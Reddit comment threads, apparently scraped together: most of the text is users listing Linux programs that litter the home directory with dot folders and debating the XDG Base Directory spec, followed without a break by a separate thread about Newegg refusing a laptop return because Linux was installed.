I'd like to add Factorio to this list. They're otherwise good and attentive devs in the linux world, so maybe they'll listen to a collective call out like this.
This used to annoy me but I found a simple, universal solution: inside of the folder that I mentally think of as my home directory is a folder called "home" that is my actual system home directory. I never put any files I care about in "home" and let whatever program clutter it up as it pleases as I never need to look inside it.

It does mean that I often have to write paths of the form ~/../stuff instead of ~/stuff, but this does not bother me.
I have these, thanks to keeping the same home dir over the years. A cleanup/migration tool would also be a good idea, IMHO.

.3dxcfg
.3dxrc
.acetoneiso
.adobe
.albumShaper
.amaya
.amsn
.aMule
.android
.aptitude
.ardour2
.aspell.es.prepl
.aspell.es.pws
.atrisrc
.audacity
.audacity-data
.automatix
.azureus
.Azureus
.bash_history
.bash_logout
.bash_profile
.bashrc
.B.blend
.bcast
.beryl
.beryl-managerrc
.bl2
.blender
.bloboats
.Blog
.cache
.cddb
.cedega
.circuslinuxrc
.compizconfig
.config
.cooliris
.cpan
.cups
.cvspass
.dbus
.debtags
.dia
.directory
.distcc
.dmrc
.dolphinview
.DownloadManager
.dropbox
.dropbox-dist
.dvdcss
.ec2
.emerald
.emusic
.esd_auth
.etracer
.evolution
.face.icon
.fetchmailrc
.fgfs
.filezilla
.fltk
.fontconfig
.fonts
.fonts.conf
.freecycle
.fretsonfire
.fs2_open
.fullcircle
.fweelin
.gaim
.gammurc
.gcjwebplugin
.gconf
.gconfd
.gegl-0.0
.gimp-2.6
.gimp-2.8
.gitconfig
.gitk
.gkrellm2
.gksu.lock
.gnome
.gnome2
.gnome2_private
.gnome-desktop
.gnubg
.gnupg
.godot
.google
.googleearth
.gpg-server
.gstreamer-0.10
.gtk-bookmarks
.gtk_qt_engine_rc
.gtkrc-1.2-gnome2
.gtkrc-2.0
.gtkrc-2.0-kde
.gtkrc-2.0-kde4
.guvcviewrc
.gvfs
.hplip
.hwdb
.ICEauthority
.icedteaplugin
.icons
.inkscape
.iriverter
.iriverter.log
.jackdrc
.java
.jigdo-lite
.jogl_ext
.kbluetooth4
.kde
.kderc
.KeyHoleTV
.kinorc
.klamav
.kluppe
.kpackage
.kphone-phonebook.xml
.ktorrent.lock
.kvirc_2
.kvirc_3
.kvirc_force_locale
.lastfm-cache
.lesshst
.lftp
.lingot
.links2
.LinNeighborhood
.linterweb
.lmmsrc.xml
.local
.loki
.lvm_history
.m2
.macromedia
.mailcap
.marble
.matplotlib
.mc
.mcop
.mcoprc
.metacity
.miro
.mozilla
.mozilla-thunderbird
.mplayer
.multisync
.MusE
.mypaint
.mysqlgui
.mysql_history
.mysqlnavigator.history
.mysqlnavigator.rc
.netbeans-registration
.netrc
.netx
.netxrc
.neverball
.node_repl_history
.nuget
.nv
.nvidia-settings-rc
.nvidia-settings-rc2
.obexftpfrontend
.openoffice.org
.openoffice.org2
.opensync-0.22
.opera
.parallel
.photoprint
.picasa
.pki
.pornview
.pronsolerc
.pronsolerc~bak
.pulse
.pulse-cookie
.purple
.putty
.pyNeighborhood
.qcomicbook
.qt
.quicksynergy
.quodlibet
.realplayerrc
.recently-used
.registry
.rpmdb
.rr.prf
.sane
.scim
.screen-profiles
.screenrc
.secondlife
.selected_editor
.simrc
.Skype
.slocdata
.sooperlooper
.sqlite_history
.ssh
.steam
.steampath
.steampid
.strigi
.subversion
.sudo_as_admin_successful
.synaptic
.synergy.conf
.TaskCoach
.teamspeak2
.thumbnails
.thunderbird
.tmux.conf
.toprc
.torcs
.trigger
.tsclient
.twinkle
.uml
.update-manager-core
.update-notifier
.vagrant.d
.var
.vim
.viminfo
.vimrc
.VirtualBox
.vlc
.vmware
.vnc
.Wammu
.wapi
.watershed
.wengophone
.wgetrc
.wine
.winetrickscache
.wings
.WorldOfGoo
.xauth
.Xauthority
.xbl-scores
.xcompmgrrc
.xfce4-session.verbose-log
.xfce4-session.verbose-log.last
.xine
.xsession-errors
.xsession-errors.old
.xvidcaprc
.Zattoo

OpenSSH is [CLOSED WONTFIX](https://bugzilla.mindrot.org/show_bug.cgi?id=2050) on this
Please just use the Arch wiki page. It's already more up to date than the list you're creating:

* unison can be overriden with ``UNISON``
* gpg-agent with ``GNUPGHOME``
* mednafen with ``MEDNAFEN_HOME``

etc. As for firefox, the bug is quite old already as you know, so it'll only ever be fixed if someone steps up and does the needful. Nobody at Mozilla has this as a priority.
I've often thought to start using something like this: [https://github.com/sloonz/rewritefs](https://github.com/sloonz/rewritefs)
I really hate the `snap` folder. It's not even hidden. 
Can confirm, Lutris is in .config/ and .local/share/

Also existing:
* audacity
* RPTools (MapTools/CharTools/TokenTools)
* DVDCSS
* elementary
* gimp-2.8
* gnupg
* hplip
* KDE4
* MakeMKV
* mono
* mozilla
* nv (nvidia?)
* ssh
* steam
[deleted]
[deleted]
I don't really see eg.: Firefox, Thunderbird, Pidgin as being that much of a problem compared to the others, since they support a ``--profile`` or similar switch -*unlike* many of the programs listed here, which means you can put any number of profiles wherever you feel is more convenient.

Also stuff that creates major profiles that work as their own entity -think Eclipse, Steam- could very well be on their own directories rather than be spread all across the $HOME. I feel it's more manageable that way in those cases.

I’m an OpenJDK upstream developer and could start a discussion upstream. I also naturally have permissions to file a bug report in the JBS.
Why are so many of those developers against this? I know maybe some users are gonna be confused by this after they update their software, but couldn't the developers also implement a way to move the old configuration files and place them into the right folders? 
From my perspective it shouldn't be such a big effort, but maybe I oversee some big issues.
Slight tangent: I was under the impression that flatpak solves this. That all data is stored in flatpak directories. Turns out, it's not the case. Tried the dropbox flatpak yesterday, and sure enough it created a .dropbox directory. Secondly, removing a flatpak doesn't remove all the cruft either. Not sure what flatpak really brings to the table. I haven't seen any great benefits yet.
These changes quite often, are much more difficult to implement than you might think, and many maintainers would argue that it is not actually worth the effort.

If the maintainer of an application was to attempt this change they would have two options:

1. Use the old directory as a fall-back
2. Continue using both directories (but prefer the new one)

The problems with each of these are as follows:

Here I will use Bash as an example. Bash currently uses the following configuration file locations:

* \`/etc/profile\`
* \`/etc/bash.bash\_logout\`
* \`\~/.bashrc\`
* \`\~/.bash\_profile\`
* \`\~/.bash\_logout\`
* \`\~/.inputrc\` (really it's for GNU readline, but we'll say it's for Bash anyway)
* and the countless other files from the days before GNU (e.g. \`.profile\`).

Let's now imagine that GNU decided to move \`\~/.bashrc\`, \`\~/.bash\_profile\` & \`\~/.bash\_logout\` to \`\~/.config/bash/\`. This would present several issues.

Distributions such as Ubuntu aim to provide a good out of the box experience for the user, and one of the ways they do this is by providing pre-configured \`\~/.bashrc\`, \`\~/.bash\_profile\` files. Now, it wouldn't be too difficult for Ubuntu to move them to their new locations, but it would certainly cause issues for the users. If the user loaded their personal \`\~/.bashrc\` files onto their Ubuntu system, which should Bash use? The user's or Ubuntu's? And how would Bash know? Just try and think about the various possibilities here, and how difficult it would be to solve it.

If Bash were to use the fall-back method, the user's configuration files would not be loaded. This would greatly confuse many users, and it would take a great long amount of time before all users switch over to the new location. This is not to mention the "tutorial problem" where many of the existing tutorials out there which tell users to "place this in \`\~/.bashrc\`", would stop working as that file is now the fall-back.

The alternative is to load both of the configuration files. This again has many issues. If Bash were to load both Ubuntu's custom "user-friendly" configuration and the user's config files, there may be problems with the order commands are loaded in. For example you may have created an alias which overrides another, depending on the order the files are loaded in, the reverse could happen. The "tutorial problem" will also occur for this situation.

That is just the tip of the iceberg.

This is not to say of the many bug reports, stack overflow and reddit posts of users asking why "insert an issue here" has just happened. The maintainers of these projects don't want to deal with this.
[deleted]
Please add dropbox, emacs, ftblauncher, gnuradio and runelite as creators of dot folders.
This is going to get downvoted to hell, but I actually prefer to keep the .files where they are. I can find them easily enough, and all the files for one app are in one location, so I can rm -rf that at once when I'm done with the app instead of hunting through multiple subdirectories.  
Pretty sure that Steam already puts everything into the proper folders, but they also have symlinks in the `.steam` folder for backwards compatibility.
For Flatpak, I do feel like it would be better in .local/var, but quite frankly none of the data fits in any other XDG directories...
[Isn't it funny when some pedants try to ruin things for everybody](https://bugzilla.mozilla.org/show_bug.cgi?id=259356#c73)

[waterfox](https://www.waterfoxproject.org/en-US/) creates
    .waterfox
Thus begins the start of linux's %appdata% directory.
[removed]
Regarding `cargo`.

Bug: https://github.com/rust-lang/cargo/issues/1734  
Current proposal for fix: https://github.com/tbu-/rust-rfcs/blob/pr_cargo_platform_standards/text/1615-cargo-platform-standards.md  
Some relevant discussion: https://github.com/rust-lang/rfcs/pull/1615  
Pull request to implement changes: https://github.com/rust-lang/cargo/pull/5183  
I totally agree with this project. 

But I should point out that the reason they have a dot in front of the filename is so they won't be seen with default `ls -l`, or most GUI file managers. 

So in essence this is an OCD exercise (not that there's anything wrong with that 😊)
Yes! Very much yes. Though personally I had mixed results with just filing bug reports.

* For wider adoption, it might be necessary to craft some patches even.
* Perhaps some generalized XDG_* handling code (there's no libxdg as such).
* I believe setting up a mailing list could be interesting.
* And declare it a "working group" then.
* Definitely needs some form of Wiki for tracking.

I had to patch my file browser to sort hidden files last to make the home dir usable.

Tbh,  we're more likely to see containers like flatpak and snaps fix this than getting every project to follow xdg guidelines. Just look at the "my documents" folder in windows. We cant remove their software from a linux store until they fix it, so there's little incentive to fix it. 
After re-reading the spec several times, I still don't understand where language package managers should store their files. 😐
Maybe you should put this on GitHub or GitLab, so that it would be easier to contribute and track the progress.
IntelliJ Idea and other jetbrains IDEs. 

[Directories used by the IDE to store settings, caches, plugins and logs](https://intellij-support.jetbrains.com/hc/en-us/articles/206544519-Directories-used-by-the-IDE-to-store-settings-caches-plugins-and-logs)
Are you gonna include games in this as well? 'Cuz I got a pretty big database of Steam games over at my [little backup side project](https://gitlab.com/supremesonicbrazil/GBML), and I gotta tell you this is more common than it looks. Maybe this could help ya, I'm sick tired of hidden folders inside $HOME as well (tbh *anything outside of the XDG Base Specification* is annoying me already, hence why I had to make this project). We would have to contact those devs en masse.

Everything from the Steam catalog up to I think May 2018 is there in the spreadsheet. It's a mixed bag as far as I recall. Games from Ethan Lee and most Feral/Aspyr ports for example are following the XDG Base Specification just fine (game saves in `~/.local/share`, configs in `~/.config`, like it should be), but you'll easily find some offenders in there (e.g. there's an open-source game called HyperRogue which creates the `~/.hyperrogue` folder).
I really don't like the XDG spec and prefer just having a bunch of dotfiles in my home directory.
I just use \`\~/Desktop\` directory and don't care about what is going on in \`\~\`.
What really bothers me is that when I uninstall an application the folder remains there, even if I use **autoremove --purge**.
Add `.android` and `.AndroidStudio3.X` to the list. Should happen with other JetBrains IDEs.
What's the problem with dot-folders? Isn't the whole idea that they're invisible so you never have to see them?
For those with OCD, and insist on using ls -a all the time, instead of just opening bugs, open a PR, with code attached.  You'll see better "progress" in getting programs to adhere to a whim of some website.

Most FOSS devs love options.  Most FOSS devs don't love work with little return, to fix something that is largely a non-issue to most folks.
I actually prefer it when applications do not use the desktop standard. Especially cross-platform programs like Thunderbird. I can migrate a Thunderbird user from Windows to Linux by simply copying their Thunderbird folder to ~/.thunderbird and it's done. If the different types of data had to be separated into .cache, .config and .local then it would break cross-platform compatibility.

Don't file bugs just to "clean up" your home folder, these directories are all hidden anyway. There is no benefit to breaking them up and burying them in separate places.
Can we not forget the most obvious example: bash

.bashrc and .bash_history belong in .config and .cache respectively, but everyone seems to be fine with it.
What’s the advantage?
I have xsane 0.999-2 + sane 1.0.27-1 installed, .sane and there is stuff which are used after last update.

Edit: Also [.binwalk](https://github.com/ReFirmLabs/binwalk) and [.Valley](https://benchmark.unigine.com/valley)
Any particular reason for using v0.6 and not the [latest spec version](https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html)?
Worse than the ones that create hidden folders are the ones that create non-hidden folders (I think steam does).
Yeah I get annoyed at stuff like this. Thanks for making a post about it and getting lucky enough to get it upvoted (if any of that was involved. Sometimes it seems to be)
.vim
Jupyter (ipython) creates `.jupyter`  
Nano editor creates `.nano`  
elinks creates `.elinks`  
mutt creates `.mutt`  
protonvpn-cli creates `.protonvpn-cli`




Here is a grabbag of Issues related to Cargo following XDG: 

https://github.com/rust-lang/cargo/issues/1734

https://github.com/rust-lang/cargo/pull/5183

RFC on the issue: https://github.com/rust-lang/rfcs/pull/1615
gnome-sound-recorder creates a folder named `Recordings` where it places files  
vscode complies with XDG specifications with one exception of using `~/.vscode` as a place to store extentions https://github.com/Microsoft/vscode/issues/3884  
nano creates `.nano`  
tuxguitar creates `.tuxguitar-1.2`  
irssi creates `.irssi` for a single config file  
I'm guessing adb creates `.android`

Please keep doing this. I've been advocating for sane home folders for a long while.

EDIT: Heck, why not throw in some dotfiles while we're at it.

wget creates `wget-hsts`  
git creates `.gitconfig`
.local/share sounds odd to me. Why not store it in .data?
The BASH guys will never move `~/.bashrc` for historical and security reasons. Doing so will break so many software, you have no idea. You can remove that from your list.
Mine:

    ./.android
    ./.fzf
    ./.local
    ./.mozilla
    ./.node-gyp
    ./.gem
    ./.mpd
    ./.icons
    ./.oh-my-zsh
    ./.thumbnails
    ./.atom
    ./.colors
    ./.ipynb_checkpoints
    ./.gnome
    ./.pgadmin
    ./.ipfs
    ./.gnupg
    ./.pki
    ./.vim
    ./.IdeaIC2017.3
    ./.ipython
    ./.arduino15
    ./.oracle_jre_usage
    ./.zsh
    ./.config
    ./.npm
    ./.ionic
    ./.jupyter
    ./.cache
    ./.ssh
    ./.3T
    ./.lyrics
    ./.droidcam
    ./.gnutls
    ./.crateApGui
    ./.jssc
    ./.ncmpcpp
    ./.vscode
    ./.urxvt
    ./.designer
    ./.themes
    ./.electron
    ./.node
    ./.java
    
DELETED
I made an aplicación a while back that has a database of all the dot-folders some applications leave,  and offers the option to backup and clean them.  With some time I will start adding all the apps you all mentioned in the comments!
One cool feature I remember adding is detecting which applications are already uninstalled, and only cleaning those files.

Anyways, if you want to give it a shot or read more about it you can find it here: [Mundus Home Folder Cleaner](https://github.com/sebikul/mundus)
Great initiative!

Mine:

Kodi

Pencil

Leonflix

IPFS

Openbazaar (.openbazaar2.0 and .openbazaar2.0-clientData)

Crusader Kings II (.paradoxinteractive) (via Steam)

Remmina

Tixati

Tupi

Voltra


`.nimble` and `.w3m`!

This is a great project.
In most programs It takes very little code to fix this problem and backwards compatibility can be maintained.

Most of mine are already listed or suggested, games seem be the main culprits on my system:

Program | Folder
---|---
Pidgin | .purple
Dwarf Fortress | .drawffortress
Factorio | .factorio
OpenTTD | .openttd
OpenRA | .openra
Please add:

|.clamtk|
|:-|
|.libdvdcss|
|.gconf|
|.gnuradio|
|.googleearth|
|.gphoto|
|.gradle|
|.java|
|.linuxmint|
|.qemu|
|.volk|
Somwehere there's an LD_PRELOAD able library that will redirect all these folders. It's not perfect but it helps.
Old thread reply, but Fiddler does this: `~/Fiddler2`
Many of those programs listed are not desktop / X / GUI apps. It is not reasonable to report these as bugs.  Not everyone's use case is for windowing systems with Linux, and enforcement of desktop standards where there is no GUI requirement becomes a slow nightmare. 

This isn't to say that directory pollution doesn't get out of hand, but it's important to to realise that not everyone has the same use case, and forcing everyone to use a standard that only works for a  common case but does not apply universally will cause friction where there is no need.
Easy fix, stop running every program with the same $HOME.
Just as a note: the XDG standards everybody is crying for here are basically **Linux-only**, (or if you will **X11-enabled unix-likes only**).

For some software, portability and single code paths for all platforms is more important than convenience for a certain class of machines.

So it is in many of those cases neither malevolence, nor incompetence nor stubbornness of the developers if they do not conform to the XDG version of doing things.

One example (ridiculed out of cluelessness in this thread) is the [response](https://github.com/npm/npm/issues/6675) of the npm dev team on such a change request, where it is well argued why this is not necessary to implement for that software.
Mask hidden files ? 
.arduino15 (Arduino IDE)
.avidemux6 (Avidemux)
.ccnet (Seafile Client)
.designer (?)
.ipynb_checkpoints (jupyter notebook)
.ipython
.jameica (Jameica)
.jclic (?)
.john
.jssc
.Mathematica
.openshot_qt
.org.jabref.JabRefMain
.pytrainer
.recoll
.remarkable
.zsnes
.weechat
Stop storing random stuff in ~.
I think it's fine for `.wine` to be top-level in the user folder.
Big fan of this project, I have often been bothered by this myself. Thank you OP.
They're hidden so why do you care?
Steam creates `.steam` (directory), `.steampath` and `steampid`.
IMO:  You are **way too uptight**.   Loosen up dude.

I looked at the referenced spec:  https://specifications.freedesktop.org/basedir-spec/0.6/ar01s03.html

My comments:

1.  It's just an fdo "standard".   fdo has more conflicting and unfollowed standards than any other place I know.  Standards in fdo are like roaches in a roach motel:  they check in but don't check out.  There is one "standard" that the original author didn't (and won't) follow (he now says it was misguided) and there is *nobody* who actually follows it.  It's still listed in fdo.
   
2.  IMO, any standard that spells "separated" incorrectly isn't a standard worth following.


OMG yes, those are very annoying, I found these ones polluting my \~/

|Pale Moon|`'.moonchild productions'` |
|:-|:-|
|Factorio|`.factorio`|
|Hedgewars|`.hedgewars`|
|Netbeans|`.netbeans`|
|yadm (yet another dotfile manager)|`.yadm`|
|Sirikali|`.SiriKali`|
|FLTK|`.fltk`|
|Prison Architect|`'.Prison Architect'`|
|Scilab|`.Scilab`|
|Minetest|`.minetest`|
[.bash_it](https://github.com/Bash-it/bash-it/issues/519)

[.stellarium](https://github.com/Stellarium/stellarium/issues/76)

[.goldendict](https://github.com/goldendict/goldendict/issues/151)

I can also add the following to the list:

| App | Folder |
|---|---|
| CMake | .cmake |
| Git | .gitconfig (file), .gitcookies (file) |
| Gradle | .gradle |
| iPython | .ipython |
| Jupyter Notebook | .jupyter |
| Less | .lesshst (file) | 
| OpenJDK | .java |
| Praat | .praat-dir |
| Python | .python_history (file) |
| ROS | .ros |
| Rust (cargo) | .cargo |
| Visual Studio Code | .vscode |
I suggest this free ebook if you want to learn more things about the Linux filesystem etc.
https://play.google.com/store/books/details?id=wLJWBQAAQBAJ
springrts creates .spring

springlobby creates .springlobby
I am indeed guilty of this myself and will keep in mind to respect XDG in the future
Here's one that nobody seems to have mentioned so far.
Hydrogen creates `~/.hydrogen`
MediathekView creates .mediathek3    
I mage a bug report here : https://github.com/mediathekview/MediathekView/issues/339  but it was closed with nofix....
ccache creates ~/.ccache

buildroot creates ~/.buildroot-ccache
* ansible ~/.ansible
* pysolfc ~/.pysolfc
* PySolFC ~/.PySolFC
* X-Plane ~/.x-plane
I'm not sure, but I think PINE creates .pinerc
Pulse audio's default.pa is supposed to be placed in ~/.pulse [link](https://linux.die.net/man/5/default.pa)

But don't know where to report it.
I agree, it's horrible. I have 150 dotfiles/folders as it seems. Sadly you can't really move them to `.config` without application changed.

I don't mind `.vimrc` though, but the rest, oh my.

Just to note: all my personal applications follow the XDG spec.
Android studio creates "Android" and ".android-studio"
filezilla
freeplane
shutter
thunderbird
virtualbox
claws-mail  
x2go  
wicd
That or use standard linux folders in the home directory.

    ~/etc
    ~/lib
    ~/bin
    ~/opt

Then it would follow the root folder on how things are organised.

Any method that is picked is better than 100's of folders cluttering up the users home folder. I don't need to `ls` my home directory and be presented with pages upon pages of folders that I will probably never venture into.
Use docker or NIXOS
great info! might need one for my gentoo!
+1 add emacs to this list. It uses ~/.emacs.d for it's configuration files
Emacs (currently `~/.emacs.d/`)
I like .ssh .vimrc and .bashrc being there for legacy compatibility but I agree about most other programs that pollute my home
Some that I don't see on this thread:

* .vnc (reported to RealVNC through their Support system)
* .gsutil (Google Cloud cli tool)
* .nestopia (WONTFIX)

Add .fonts too, when fonts are installed through font manager they get installed in .fonts in kde
You mentioned citra. For me the files are in .local, but I used the AUR to install it IIRC
I guess putting it into the archwiki list would be more helpful, but I'm not loosing much by putting in a list here too):
* Retropie (not even hidden)
* .clusterssh
* .emulationstation (as a symbolic link, don't know if it's needed by Retropie)
* .moc

and the usual culprits. .i3, .mozilla, etc.
AWS
* `awscli`, creates `.aws`

K8s
* `helm`, creates `.helm`
* `kubectl`, creates `.kube`


Add 

GHC, creates .ghc
(ruby) gem, creates .gem
I think libpurple creates its own dot folder for finch, as well. 
irssi - [Won't Fix](https://github.com/irssi/irssi/pull/511)/[Partial](https://wiki.archlinux.org/index.php/XDG_Base_Directory_support#Partial) ... interesting
New success:
https://www.reddit.com/r/linux_gaming/comments/97l5bk/cc_tiberian_sun_full_game_download_now_available

The maker who put Tiberian Sun on Linux implemented the standard the moment I pointed him to this thread!
Xournal creates .xournal [https://sourceforge.net/projects/xournal/](https://sourceforge.net/projects/xournal/)
After three years of usage there 119 application created .dotfolders and even regular folders in my $HOME.

This is a problem that is getting out of hand for me.
Has everyone forgotten about the [FHS](http://www.pathname.com/fhs/pub/fhs-2.3.pdf)?

> 3.8.2 User specific configuration files for applications are stored in the user’s home directory in a file that starts with the ’.’ character (a "dot file"). If an application needs to create more than one dot file then they should be placed in a subdirectory with a name starting with a ’.’ character, (a "dot directory"). In this case the configuration files should not start with the ’.’ character.^11

> ^11 It is recommended that apart from autosave and lock files programs should refrain from creating non dot files or directories in a home directory without user intervention.

I'm failing to see the problem. While a lot of stuff currently uses folders like .config, .local, .cache, yes there are quite a few that still do not. Yes, mozilla's applications and SSH are offenders, but keep in mind, those applications are insanely old. Changing them now would cause a lot of unhappy users as a result, especially those who've been Linux users for many many years (including myself). Another thing to think about too is our shells have always used dot files that don't exist in a dot directory. I'm thinking back to even the Solaris days, you had .profile for example. I'm not really seeing any problems.

I'm sure part of it is a lot of those who complain about the "littering" is because they run `ls -la`
rather than keeping the `-a`option off of the command line, or in their file manager, they turn on hidden folders. 

When I'm in a home directory and I need to find my SSH stuff, my first instinct is `~/.ssh` - why would we want to change that? I'm on a brand new system, my first thought is to modify `~/.bashrc` - why would we want to change that? It's been like this for many years.

The only *valid* complaint, in my opinion, is when an application purposely creates a directory that does not start with a `.` (see the FHS). That's when I have a problem. But a directory like `.mozilla` or `.ssh` should not cause some sort of arbitrary alarm. 

This more and more sounds like people just want to change things just to change them.

I would refer to this [mail list](https://lists.debian.org/debian-user/2014/11/msg01817.html) also.
You can change the location of the configuration files for some of the programs on the list. GIMP  or Vim for example. There might be more, so that comes off as poorly "researched" and reactionary.
Reported for /r/gramps genealogy program back in 2014!

>8025 : Please use the XDG Basedir Spec  
>  
>[https://gramps-project.org/bugs/view.php?id=8025](https://gramps-project.org/bugs/view.php?id=8025)

Uses the **.gramps** folder.
I agree.  Why can't there be a .applicationdata folder or something and then all that crap can be inside there?
The most annoying ones in mine are .dbus, .weechat, .pki, and .Xauthority. Those have no good reason to be there.

.mozilla, .ssh and .gnupg are unlikely to change anytime soon, so I'm not holding my breath, but I would like them gone as well.
Megacmd, tor browser and vba-m too.
More for the list

- urxvt
- vimperator
- teeworlds
- sage
- rviz
- remmina
- julia
- ~~i3~~
- gnuradio
- emacs
- aqemu
- dronekit
On my computer:

* Arduino IDE creates `Arduino`
* Docker creates `.docker`
* gitbook creates `.gitbook`
* hplip (oss hp printer driver) creates `.hplip`
* Visual Studio Code creates `.vscode`
* Python tox creates `.tox`
* OpenSSH requires (but does not create) `.ssh`
* Remmina creates `.remmina`
* Oh my ZSH `.oh-my-zsh`
* PyCharm creates `.PyCharm2018.1` (one for each version)
* pylint creates `.pylint.d`
* bCNC creates `.bCNC` and `.bCNC.history` (files, not directories)
* Less creates `.lesshst` (file, not directory)
I think some of the issues is that some of the software is cross platform which means other platforms obviously aren't going to use the freedesktop spec.

Though, I still think that's a lazy excuse.
Why do you care? Alias `ls -la` with `ls -l` if cwd is ~/
I hate folders. We should have moved beyond them by now ... at least for the most part. Files should have 'call numbers' or hashes and be indexed upon creation into a searchable catalogue of authors/keywords/dates etc. I shouldn't have to name a file, I should only provide some tags which might not be 'obvious' to the indexer (especially for photos).
[deleted]
Just delete them, what's the worst that could happen?
[deleted]
That's mostly up to the developer.
To be really tidy, a dev should use ENV variable $XDG_CONFIG_HOME, where configs should be stored. cache files should be also stored in an env variable defined location, which is usually by default a .local/cache, if i'm not mistaken.
I know man. Using window manager, and terminal apps somewhat cleans that though. Terminal users tend to be closer to specs.
Great initiative!
THIS IS WARRRRR DELETE THE FUCKING DOT FILES.
Is it possible to make a boilerplate for bug reports? I have 50 .folders in my home folder. 
Like many, I've always received excellent customer support from Newegg, but apparently they aren't big fans of Linux.  I ordered an E525 Thinkpad from them that I received on time and seemingly without issue.  The system appeared to work properly and had no issues with the Linux Mint 13 install placed on it for 2 days.  On the third day of use a loud coil squeal/chirp became apparent, becoming louder when it was running on battery power.  Within hours the wireless chipset failed and refused to connect, the display began glitching with horizontal lines appearing through it, and it became unresponsive.  I tested it with a Windows live USB thumb drive, just to ensure there was no problem with the OS before RMAing it. 

The RMA was declined for a "modified/altered operating system."  I spoke with a support agent, as well as a manager who couldn't comprehend the difference between an obvious hardware failure that could be found running the BIOS provided diagnostics, and the Linux installation.  

I've used Newegg for years and spent tens of thousands on tech gear with them, so I'm really bummed out by this situation.  I know that they've gone through quite a bit of growth lately and I had hoped that they would retain their world class customer service.  It appears that they haven't.  :(

EDIT 1 - I'll get a copy of the RMA reply I had today, just give me a sec.  The "manager" I talked to wouldn't respond to any attempt to explain the situation at all.  She said that the system had been modified and was very forceful in standing by the refusal.  

EDIT 2 - RMA decline response -> http://imgur.com/7bcIJ  
The restore partition was left intact, so I don't know what issue they're having there.

EDIT 3 - Yes, I intentionally left the name on the RMA response.  Hoping perhaps I might get a call from Newegg.

EDIT 4 - I submitted this to Consumerist earlier today and am waiting to hear back from them.

EDIT 5 - I'm going to sleep now and will check this in the morning.  Not sure of whether I will hear back from them on the weekend, but Newegg has been informed of this post by myself and others.

6/9/2012

EDIT 6 - WOW! I just woke up and was not expecting the level of response I've gotten from this post.  Still nothing from Newegg, but I certainly wouldn't expect it at 3:37am PDT.  I'll keep everyone updated on what I hear back.

EDIT 7 - I still haven't heard anything from them at 12:04pm EST, and I'm not sure if I will before Monday.

6/10/2012

EDIT 8 - This edit will remain with a periodically updated time until I hear back from them.  NO RESPONSE AS OF - 11:42PM EST Jun 10

6/11/2012

EDIT 9 - I'm receiving some scripted looking emails from info@newegg.com this afternoon:

"This notification has been sent because we provided you an earlier email in error. You were sent an email indicating that we had posted your item(s) as part of the "Return." Unfortunately, this was sent in error; although it is rare, RMA numbers are occasionally posted by mistake."

Don't know what to make of that considering I was escalated and spoke with a manager who had my account pulled up and the exact response from the tech about the "modified OS."

I also got a blank $0.00 order confirmation from them and a UPS 3 Day Select shipping confirmation.  Don't know if that's the old one coming back or if they're sending a new one.    The order number comes up blank if I check the status on Newegg.com.

Stay tuned.

6/12/2012

EDIT 10 (hopefully final) -

 I'm sure many of you saw this story on Consumerist and the front page of Slashdot today.  I spoke with a "Public Image Professional" from Newegg who contacted me via email.  She immediately offered to replace the laptop or process a full refund, and I accepted the latter given all the issues I've had with them.  I received an RMA confirmation telling me that it has been approved as a defective product return, and that I will receive a credit in 3-5 business days.

So pending a credit, they've resolved the issue.
It looks like Newegg's RMA department has gotten pretty bad lately: http://hardforum.com/showthread.php?t=1694667

You might try the same approach that person took. Or could you RMA directly with Lenovo?
Hi. Canonical employee here. Thinkpad Edge E525 (codename Sutton, Canonical ID 201107-8258) was certified for use with Ubuntu in our Lexington Certification Lab at 2011-08-10 13:25.

 * https://certification.canonical.com/hardware/201107-8258
 * https://certification.canonical.com/certificate/1112-3579

Screenshot of certification here:

 * http://ubuntuone.com/6vg6Vzw4GtYyoStjDEjqup

Hope this helps.

Edit: As others have pointed out, you have to sign up (for free) to use the above certification URLs since certification.canonical.com is the submission system. No signup required at: http://www.ubuntu.com/certification/desktop/
They're splitting hairs over the OS because it's just the sort of contrivance they need to justify their decision to deny support. It's what happens when a support team, most likely under the direction of bean counters in management, approach every troubleshooting activity like a witch hunt. It's not so much "how can we help" as it is "how can we avoid responsibility?"

And the fact that you sent back a laptop with obvious hardware problems and they were instantly stonewalled by a missing Windows recovery partition speaks of total ignorance rather than prejudice. I doubt anyone involved in your RMA situation even knows what Linux is.
[deleted]
When I mentioned in another thread a few months ago that it was important to keep the OEM Windows partition shrunk but intact for this reason, I was down voted to hell.  Unfortunately, some vendors pull these stunts so it is important to keep the OEM Windows partition intact.  Shrink it as small as you can, but leave it on the drive.
Dear Newegg:  Make this right or you are dead to me.  (Longtime customer.)
If you're getting a ThinkPad why not just buy it from Lenovo, you can even order certain models with linux pre-installed and avoid the Windows tax. 
I have spent so much money on stuff from newegg before..

But lately, I have noticed that newegg is a lot different, and I haven't really liked the change.. They seem to be trying to turn in to amazon.. Because now they have all sorts of stupid non-computer-related crap, and also they are starting to have items on there that are actually shipping from external companies (just like amazon does.)..

What also pisses me off is the part of the response from newegg that says "Unit can not be accepted or resold as received.".. Well it SHOULDN'T be resold!! It is BROKEN.. I have ran in to this same stupid response from the *manager* of geek squad at best buy.. There was a hardware malfunction on some crappy HP laptop.. I try to take it back but I had linux on it, and he told me "I can't take this back, you put linux on it, and linux broke the laptop.".. I was so pissed.. But then he said "I can't take it back because it has linux on it and it won't be resellable".. Well you SHOULDN'T BE RESELLING IT IN THE FIRST PLACE. Like all they care about is if they can turn around and sell some one the same shitty laptop that I am telling them is broken..

Any way.. These days I just find the computer part/parts that I want to buy, and I use google product search to find the cheapest place that has it.. Some times it is newegg, and some times it is some where else.. And it shows stars and reviews for all the places too..
I would have hoped that newegg.com employees would the people that know about GNU/Linux. That, and I would have hoped that they would have been able to spot an obvious issue with the hardware which is obviously not related to the software installed.



I know it doesn't fix the issue with newegg's support, but you could try to go straight to ~~IBM~~ Lenovo for replacement. I've dealt with both Sony and Dell's support and though I had to ship the laptop in and wait a few weeks, it didn't seem to matter what software was running on it as they install the stock OS back on anyhow.
That's an awful thing to hear. I have trusted Newegg for ages, and they should know a lot better than this. I would charge it back, and call them and tell them you charged back. This will escalate the issue on their end to someone who should know what the fuck they are doing and that you should get an RMA. In the meantime, put the machine back in the box as it is and follow the instructions of your bank/ CC company.

You might have some luck trying to RMA it with Lenovo themselves; they shouldn't give you shit about changing the OS.
Do they have no idea who their target audience is? Sweet jesus. 
Is NewEgg going to make a statement and clarify their policy in this situation? This is a big deal and knowing that they are going to handle this right going forward is important to me, as a consumer.
